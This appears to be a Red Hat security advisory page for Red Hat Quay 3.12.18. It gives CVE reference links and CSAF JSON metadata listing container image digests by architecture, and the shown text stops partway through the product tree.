https://www.cve.org/CVERecord?id=CVE-2026-42035	external
https://nvd.nist.gov/vuln/detail/CVE-2026-42035	external
https://github.com/axios/axios/security/advisorie…	external
https://access.redhat.com/security/cve/CVE-2026-42039	self
https://bugzilla.redhat.com/show_bug.cgi?id=2461630	external
https://www.cve.org/CVERecord?id=CVE-2026-42039	external
https://nvd.nist.gov/vuln/detail/CVE-2026-42039	external
https://github.com/axios/axios/security/advisorie…	external
https://access.redhat.com/security/cve/CVE-2026-42041	self
https://bugzilla.redhat.com/show_bug.cgi?id=2461629	external
https://www.cve.org/CVERecord?id=CVE-2026-42041	external
https://nvd.nist.gov/vuln/detail/CVE-2026-42041	external
https://github.com/axios/axios/security/advisorie…	external
https://access.redhat.com/security/cve/CVE-2026-42043	self
https://bugzilla.redhat.com/show_bug.cgi?id=2461626	external
https://www.cve.org/CVERecord?id=CVE-2026-42043	external
https://nvd.nist.gov/vuln/detail/CVE-2026-42043	external
https://github.com/axios/axios/security/advisorie…	external
https://access.redhat.com/security/cve/CVE-2026-42044	self
https://bugzilla.redhat.com/show_bug.cgi?id=2461624	external
https://www.cve.org/CVERecord?id=CVE-2026-42044	external
https://nvd.nist.gov/vuln/detail/CVE-2026-42044	external
https://github.com/axios/axios/security/advisorie…	external

Acknowledgments

Antony Di Scala Michael Whale

JSON

To clipboard

{
  "document": {
    "aggregate_severity": {
      "namespace": "https://access.redhat.com/security/updates/classification/",
      "text": "Important"
    },
    "category": "csaf_security_advisory",
    "csaf_version": "2.0",
    "distribution": {
      "text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
      "tlp": {
        "label": "WHITE",
        "url": "https://www.first.org/tlp/"
      }
    },
    "lang": "en",
    "notes": [
      {
        "category": "summary",
        "text": "Red Hat Quay 3.12.18 is now available with bug fixes.",
        "title": "Topic"
      },
      {
        "category": "general",
        "text": "Quay 3.12.18",
        "title": "Details"
      },
      {
        "category": "legal_disclaimer",
        "text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
        "title": "Terms of Use"
      }
    ],
    "publisher": {
      "category": "vendor",
      "contact_details": "https://access.redhat.com/security/team/contact/",
      "issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
      "name": "Red Hat Product Security",
      "namespace": "https://www.redhat.com"
    },
    "references": [
      {
        "category": "self",
        "summary": "https://access.redhat.com/errata/RHSA-2026:22629",
        "url": "https://access.redhat.com/errata/RHSA-2026:22629"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2025-62718",
        "url": "https://access.redhat.com/security/cve/CVE-2025-62718"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-2377",
        "url": "https://access.redhat.com/security/cve/CVE-2026-2377"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-32281",
        "url": "https://access.redhat.com/security/cve/CVE-2026-32281"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-32282",
        "url": "https://access.redhat.com/security/cve/CVE-2026-32282"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-32589",
        "url": "https://access.redhat.com/security/cve/CVE-2026-32589"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-32590",
        "url": "https://access.redhat.com/security/cve/CVE-2026-32590"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-33894",
        "url": "https://access.redhat.com/security/cve/CVE-2026-33894"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-34986",
        "url": "https://access.redhat.com/security/cve/CVE-2026-34986"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-39892",
        "url": "https://access.redhat.com/security/cve/CVE-2026-39892"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-40192",
        "url": "https://access.redhat.com/security/cve/CVE-2026-40192"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-40895",
        "url": "https://access.redhat.com/security/cve/CVE-2026-40895"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-42033",
        "url": "https://access.redhat.com/security/cve/CVE-2026-42033"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-42035",
        "url": "https://access.redhat.com/security/cve/CVE-2026-42035"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-42039",
        "url": "https://access.redhat.com/security/cve/CVE-2026-42039"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-42041",
        "url": "https://access.redhat.com/security/cve/CVE-2026-42041"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-42043",
        "url": "https://access.redhat.com/security/cve/CVE-2026-42043"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/cve/CVE-2026-42044",
        "url": "https://access.redhat.com/security/cve/CVE-2026-42044"
      },
      {
        "category": "external",
        "summary": "https://access.redhat.com/security/updates/classification/",
        "url": "https://access.redhat.com/security/updates/classification/"
      },
      {
        "category": "self",
        "summary": "Canonical URL",
        "url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_22629.json"
      }
    ],
    "title": "Red Hat Security Advisory: Red Hat Quay 3.12.18",
    "tracking": {
      "current_release_date": "2026-06-30T15:25:25+00:00",
      "generator": {
        "date": "2026-06-30T15:25:25+00:00",
        "engine": {
          "name": "Red Hat SDEngine",
          "version": "5.3.1"
        }
      },
      "id": "RHSA-2026:22629",
      "initial_release_date": "2026-06-02T18:16:29+00:00",
      "revision_history": [
        {
          "date": "2026-06-02T18:16:29+00:00",
          "number": "1",
          "summary": "Initial version"
        },
        {
          "date": "2026-06-02T18:16:38+00:00",
          "number": "2",
          "summary": "Last updated version"
        },
        {
          "date": "2026-06-30T15:25:25+00:00",
          "number": "3",
          "summary": "Last generated version"
        }
      ],
      "status": "final",
      "version": "3"
    }
  },
  "product_tree": {
    "branches": [
      {
        "branches": [
          {
            "branches": [
              {
                "category": "product_name",
                "name": "Red Hat Quay 3.12",
                "product": {
                  "name": "Red Hat Quay 3.12",
                  "product_id": "Red Hat Quay 3.12",
                  "product_identification_helper": {
                    "cpe": "cpe:/a:redhat:quay:3.12::el8"
                  }
                }
              }
            ],
            "category": "product_family",
            "name": "Red Hat Quay"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
                "product": {
                  "name": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
                  "product_id": "registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:d91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-container-security-operator-bundle@sha256%3Ad91c880570c005cb2edcb07d29f8df09504b65710dde2b0c95d17c139c92b777?arch=amd64\u0026repository_url=registry.redhat.io/quay/quay-container-security-operator-bundle\u0026tag=1779202442"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
                "product": {
                  "name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
                  "product_id": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-container-security-operator-rhel8@sha256%3A27ab48d03362b795605f841ec15ac20b869e8bd6e69a783d9be7643f6af33a93?arch=amd64\u0026repository_url=registry.redhat.io/quay/quay-container-security-operator-rhel8\u0026tag=1779201814"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
                "product": {
                  "name": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
                  "product_id": "registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:bfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-bridge-operator-bundle@sha256%3Abfae5410144f3a5b76847634efb9d78407591df98e67f639796e212a4739128b?arch=amd64\u0026repository_url=registry.redhat.io/quay/quay-bridge-operator-bundle\u0026tag=1779212764"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
                "product": {
                  "name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
                  "product_id": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:e289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-bridge-operator-rhel8@sha256%3Ae289bf320046335ecf1d032c3add538a539b0f8ded8bca56d0a3c4655f712720?arch=amd64\u0026repository_url=registry.redhat.io/quay/quay-bridge-operator-rhel8\u0026tag=1779212189"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
                "product": {
                  "name": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
                  "product_id": "registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-builder-qemu-rhcos-rhel8@sha256%3A6530ab268b54cf9a6cd2166dc89ae86b7e908a4ed26301440f69a6ca7af4a4e9?arch=amd64\u0026repository_url=registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8\u0026tag=1779202203"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
                "product": {
                  "name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
                  "product_id": "registry.redhat.io/quay/quay-builder-rhel8@sha256:002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-builder-rhel8@sha256%3A002bb098e96b7521e2a9ecc5aac3c4a488d46cd34b10297bde34875101b8d6bc?arch=amd64\u0026repository_url=registry.redhat.io/quay/quay-builder-rhel8\u0026tag=1779201784"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
                "product": {
                  "name": "registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
                  "product_id": "registry.redhat.io/quay/clair-rhel8@sha256:029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/clair-rhel8@sha256%3A029c3754ef9adb693785cbb90855eac14da6ff7319b581e06fa80a319b4b397f?arch=amd64\u0026repository_url=registry.redhat.io/quay/clair-rhel8\u0026tag=1779201791"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
                "product": {
                  "name": "registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
                  "product_id": "registry.redhat.io/quay/quay-operator-bundle@sha256:9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-operator-bundle@sha256%3A9da58edb2793b2a2fe559fbf9764c251a1fc19a3062956f39e0f138ebb0efffd?arch=amd64\u0026repository_url=registry.redhat.io/quay/quay-operator-bundle\u0026tag=1779841290"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64",
                "product": {
                  "name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64",
                  "product_id": "registry.redhat.io/quay/quay-operator-rhel8@sha256:f8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-operator-rhel8@sha256%3Af8b228501a85e99cc3f3c6af1b8f927c72c5f779ef4db74e4706d2d46042800b?arch=amd64\u0026repository_url=registry.redhat.io/quay/quay-operator-rhel8\u0026tag=1779201803"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
                "product": {
                  "name": "registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
                  "product_id": "registry.redhat.io/quay/quay-rhel8@sha256:c8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978_amd64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-rhel8@sha256%3Ac8de70845d1b044f955b1bcdab78ea997a665a9322b3fb8635602679292d8978?arch=amd64\u0026repository_url=registry.redhat.io/quay/quay-rhel8\u0026tag=1779811412"
                  }
                }
              }
            ],
            "category": "architecture",
            "name": "amd64"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
                "product": {
                  "name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
                  "product_id": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b_arm64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-container-security-operator-rhel8@sha256%3A5195314fca91a9531d77397274098564c8e3271f0a9f3adcc4b65b0dc8e2aa8b?arch=arm64\u0026repository_url=registry.redhat.io/quay/quay-container-security-operator-rhel8\u0026tag=1779201814"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
                "product": {
                  "name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
                  "product_id": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:ec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc_arm64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-bridge-operator-rhel8@sha256%3Aec3dc9f6eb57ec9dca9ef4c61d3671f2cca32910ca5c7cc37e2f8e1159594fcc?arch=arm64\u0026repository_url=registry.redhat.io/quay/quay-bridge-operator-rhel8\u0026tag=1779212189"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
                "product": {
                  "name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
                  "product_id": "registry.redhat.io/quay/quay-builder-rhel8@sha256:34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5_arm64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-builder-rhel8@sha256%3A34885b92ee88d400d16f1bc86452d418c79b2f979136614b3887cec67fa353d5?arch=arm64\u0026repository_url=registry.redhat.io/quay/quay-builder-rhel8\u0026tag=1779201784"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
                "product": {
                  "name": "registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
                  "product_id": "registry.redhat.io/quay/clair-rhel8@sha256:8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e_arm64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/clair-rhel8@sha256%3A8e1fcc9086776db526a1b2fcbb7c068d71e82eef7098b7df0f72d6a7995bcd7e?arch=arm64\u0026repository_url=registry.redhat.io/quay/clair-rhel8\u0026tag=1779201791"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
                "product": {
                  "name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
                  "product_id": "registry.redhat.io/quay/quay-operator-rhel8@sha256:124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e_arm64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-operator-rhel8@sha256%3A124bada0022d71ad1c20aba7350af8625eac26ef81f89154d22a5f7b8d74820e?arch=arm64\u0026repository_url=registry.redhat.io/quay/quay-operator-rhel8\u0026tag=1779201803"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
                "product": {
                  "name": "registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
                  "product_id": "registry.redhat.io/quay/quay-rhel8@sha256:6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26_arm64",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-rhel8@sha256%3A6e84443d520fc3f75352783c17e4262db596b6a7b194970f0cb276e52aa7cb26?arch=arm64\u0026repository_url=registry.redhat.io/quay/quay-rhel8\u0026tag=1779811412"
                  }
                }
              }
            ],
            "category": "architecture",
            "name": "arm64"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
                "product": {
                  "name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
                  "product_id": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06_ppc64le",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-container-security-operator-rhel8@sha256%3A65750c25a337679bbecb7ff4e443df5df76f089ce27952203863d80710b15e06?arch=ppc64le\u0026repository_url=registry.redhat.io/quay/quay-container-security-operator-rhel8\u0026tag=1779201814"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
                "product": {
                  "name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
                  "product_id": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682_ppc64le",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-bridge-operator-rhel8@sha256%3A034737d3954911f9371c0422ef1b204ba00546d53febfe55ee704e0df2b57682?arch=ppc64le\u0026repository_url=registry.redhat.io/quay/quay-bridge-operator-rhel8\u0026tag=1779212189"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
                "product": {
                  "name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
                  "product_id": "registry.redhat.io/quay/quay-builder-rhel8@sha256:8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c_ppc64le",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-builder-rhel8@sha256%3A8745cd1c93673e8b33cd80758d16b96f49f49d28fbfce60a069578cb17baa88c?arch=ppc64le\u0026repository_url=registry.redhat.io/quay/quay-builder-rhel8\u0026tag=1779201784"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
                "product": {
                  "name": "registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
                  "product_id": "registry.redhat.io/quay/clair-rhel8@sha256:b59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557_ppc64le",
                  "product_identification_helper": {
                    "purl": "pkg:oci/clair-rhel8@sha256%3Ab59d8c379e69debc315b9cad3e155ff2a6e458426b76bb1b6d86e2cf08c56557?arch=ppc64le\u0026repository_url=registry.redhat.io/quay/clair-rhel8\u0026tag=1779201791"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
                "product": {
                  "name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
                  "product_id": "registry.redhat.io/quay/quay-operator-rhel8@sha256:14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c_ppc64le",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-operator-rhel8@sha256%3A14aa439dcd023927e6d6f27d3695bf99cf0aabe11f4c86f767ef2186bd9b886c?arch=ppc64le\u0026repository_url=registry.redhat.io/quay/quay-operator-rhel8\u0026tag=1779201803"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
                "product": {
                  "name": "registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
                  "product_id": "registry.redhat.io/quay/quay-rhel8@sha256:80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a_ppc64le",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-rhel8@sha256%3A80c3d7a1c4b60d82101d6ab598498977fd7e5e6c3a82be0c44afec6fb84cb45a?arch=ppc64le\u0026repository_url=registry.redhat.io/quay/quay-rhel8\u0026tag=1779811412"
                  }
                }
              }
            ],
            "category": "architecture",
            "name": "ppc64le"
          },
          {
            "branches": [
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
                "product": {
                  "name": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
                  "product_id": "registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:e6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72_s390x",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-container-security-operator-rhel8@sha256%3Ae6855bb1099a4bb1b0e53d7ee2359edd8f0b35eafd785eae32eeb7a9939eda72?arch=s390x\u0026repository_url=registry.redhat.io/quay/quay-container-security-operator-rhel8\u0026tag=1779201814"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
                "product": {
                  "name": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
                  "product_id": "registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:cfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93_s390x",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-bridge-operator-rhel8@sha256%3Acfebea8a32ebeec3963d3b41f8161fd65f698c20d1ffa1f03c630d776c612c93?arch=s390x\u0026repository_url=registry.redhat.io/quay/quay-bridge-operator-rhel8\u0026tag=1779212189"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
                "product": {
                  "name": "registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
                  "product_id": "registry.redhat.io/quay/quay-builder-rhel8@sha256:4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a_s390x",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-builder-rhel8@sha256%3A4c0fde56c49356b322ce15194f8da85ea16cd2a7a80a6c8e7d38b94e22cc6e8a?arch=s390x\u0026repository_url=registry.redhat.io/quay/quay-builder-rhel8\u0026tag=1779201784"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
                "product": {
                  "name": "registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
                  "product_id": "registry.redhat.io/quay/clair-rhel8@sha256:37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f_s390x",
                  "product_identification_helper": {
                    "purl": "pkg:oci/clair-rhel8@sha256%3A37b54107d51f1aa0aa0bfd02e5373bc5c17fe98521b4a065126fe76a9b5d4a8f?arch=s390x\u0026repository_url=registry.redhat.io/quay/clair-rhel8\u0026tag=1779201791"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
                "product": {
                  "name": "registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
                  "product_id": "registry.redhat.io/quay/quay-operator-rhel8@sha256:9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1_s390x",
                  "product_identification_helper": {
                    "purl": "pkg:oci/quay-operator-rhel8@sha256%3A9756cfa3d2ed7bcf1c680c9003e0ed90247c4cf8aac020d01ad927058b3b45e1?arch=s390x\u0026repository_url=registry.redhat.io/quay/quay-operator-rhel8\u0026tag=1779201803"
                  }
                }
              },
              {
                "category": "product_version",
                "name": "registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x",
                "product": {
                  "name": "registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x",
                  "product_id": "registry.redhat.io/quay/quay-rhel8@sha256:f88e76824ab3d5d3b054bb79c33fc5bf8183238a8bf3e963d978437b0cfa2d69_s390x",
                  "product_identification_helper": {
